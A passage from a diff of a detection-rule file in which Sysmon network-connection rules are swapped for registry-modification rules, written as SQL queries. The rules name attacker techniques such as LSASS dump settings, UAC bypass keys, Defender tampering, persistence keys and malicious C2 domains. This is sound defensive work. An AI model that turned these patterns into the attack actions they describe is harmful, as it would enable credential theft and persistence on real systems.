'%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", "status": "test", - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", - "author": "frack113", + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_imewdbld.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "status": "test", + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ + "attack.privilege_escalation", + "attack.persistence", "attack.defense_evasion", - "attack.t1218.003" + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((Details LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (Details LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR Details LIKE 'wscript%' ESCAPE '\\' OR Details LIKE 'cscript%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", + "status": "test", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", + "tags": [ + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + ], + "filename": "registry_set_comhijack_sdclt.yml" + }, + { + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", - "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "title": "Hide Schedule Task Via Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "status": "experimental", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127.001" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", + "status": "experimental", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.impact", - "attack.t1496" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate use of crypto miners" + "Legitimate application that needs to do a full dump of their process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_lsass_usermode_dumping.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Disable PUA Protection on Windows Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", "status": "experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.lateral_movement" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\edge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR Image LIKE '%\\\\Engine.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", - "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate certutil network connection" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1203" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "VBScript Payload Stored in Registry", + "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "status": "experimental", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_script_wan.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Change User Account Associated with the FAX Service", + "id": "e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR DestinationHostname LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 